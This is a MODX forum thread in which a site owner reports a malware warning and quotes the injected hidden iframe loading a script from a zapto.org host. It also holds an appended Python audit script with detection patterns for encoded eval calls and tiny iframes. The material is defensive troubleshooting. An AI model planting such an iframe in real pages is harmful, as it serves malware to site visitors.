    • 42601
    • 24 Posts
    Hi all,

    I'm hoping that someone is able to assist me. I have just recently upgraded to 2.2.6-pl; however, I now have a message from Google that my website has malware. If I load the website and select view source I can see the offending code:

    <iframe src="http://fdsfsddfs.zapto.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe></body>

    However, I cannot find it in MODX. Could someone help me out here please?

    Thanks

    Also, the manager page keeps refreshing and I have to press stop to even get in.

    Trev
      • 3749
      • 24,544 Posts
      It could be coming from just about anywhere, but the first place to look is in the index.php file in the root. Compare it to the original. You probably won't see that string. It will most likely be encoded.

      By far the safest thing would be to restore a backup from before the infection, change all your usernames and passwords, and go from there.
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        • 42601
        • 24 Posts
        I'm struggling to understand how this got onto the website... the only thing I have done is install the new tinyMCE, new MODX, and 2 news plugins... I don't understand it. I flushed permissions and flushed cache and that's when this all started.

        This is what my index.php looks like:

        <?php
        require_once dirname(dirname(__FILE__)).'/index.php';
        $modx->request->handleRequest(array('location' => 'source'));

        Does this look normal?

        Trev
          • 3749
          • 24,544 Posts
          Not if it's the index.php in the MODX root (the directory with the Manager and Core directories). You could be looking at the wrong one, though.

          Malware can show up for lots of different reasons. It could be a cross-site attack from someone else on a shared server or it could be that someone has used a brute-force attack to get your MODX admin, cPanel, or FTP password by trial-and-error. It could also come from an insecure form on your site.
            • 39501
            • 163 Posts
            Quite a few years ago, Media Temple got hacked, and malware was inserted into every index file on my web server. Didn't matter what system I was using (MODX, TextPattern, WordPress etc), they all became infected.

            My first instinct was to point the finger at MODX, TextPattern etc, because at the time Media Temple were being very vague about the situation; however, they eventually came clean that their systems had been compromised.

            The malware might not be inserting itself in the web root of your website. It might be triggered from a folder below the web root. If you have access, have a look (including any odd .htaccess files).

            Have you tried googling to see if any other people on your host are having the same issues?

            Could you confirm your hosting provider?
            Can you also confirm where you got the upgrade package from (was it via the MODX website)?
            [ed. note: jonleverrier last edited this post 11 years, 2 months ago.]
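
Added example, not part of any post in this thread and not MODX code: one way to carry out the "compare it to the original" advice across the whole site, including folders below the web root and stray .htaccess files. It assumes a pristine copy of the same release unpacked in a second directory; the function names, extension lists and patterns are assumptions chosen for illustration.

```python
import hashlib
import re
import sys
from pathlib import Path

# Heuristic patterns (assumed for this example, not taken from the thread):
# decoder calls often used to hide injected PHP, and near-invisible iframes
# like the 2x2 one quoted in the first post.
SUSPICIOUS = {
    "encoded-eval": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "tiny-iframe": re.compile(
        rb"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?[0-3]\b[^>]*>", re.I),
}
EXEC_EXT = {".php", ".phtml"}                      # can run code on the server
SCAN_EXT = EXEC_EXT | {".html", ".htm", ".js", ".tpl"}


def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit(site_root, clean_root):
    """Compare a live tree with a pristine copy of the same release."""
    site, clean = Path(site_root), Path(clean_root)
    report = {"modified": [], "extra": [], "suspicious": []}
    for f in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = f.relative_to(site).as_posix()
        ref = clean / rel
        scannable = f.suffix.lower() in SCAN_EXT or f.name == ".htaccess"
        if not ref.is_file():
            # Not shipped with the release. Uploads and cache data are skipped;
            # code and .htaccess files are listed and need a manual look
            # (the site's own config files will appear here too).
            if f.suffix.lower() in EXEC_EXT or f.name == ".htaccess":
                report["extra"].append(rel)
        elif digest(f) != digest(ref):
            report["modified"].append(rel)
        if scannable:
            data = f.read_bytes()
            report["suspicious"] += [(rel, name) for name, rx in SUSPICIOUS.items()
                                     if rx.search(data)]
    return report


if __name__ == "__main__":
    # Usage: python audit.py /path/to/live/site /path/to/clean/release
    for kind, items in audit(sys.argv[1], sys.argv[2]).items():
        for item in items:
            print(kind, item)
```

A clean result from the pattern scan does not clear a file; the hash comparison against the pristine release is the stronger signal, and it is worth running from a copy of the site pulled down to a separate machine.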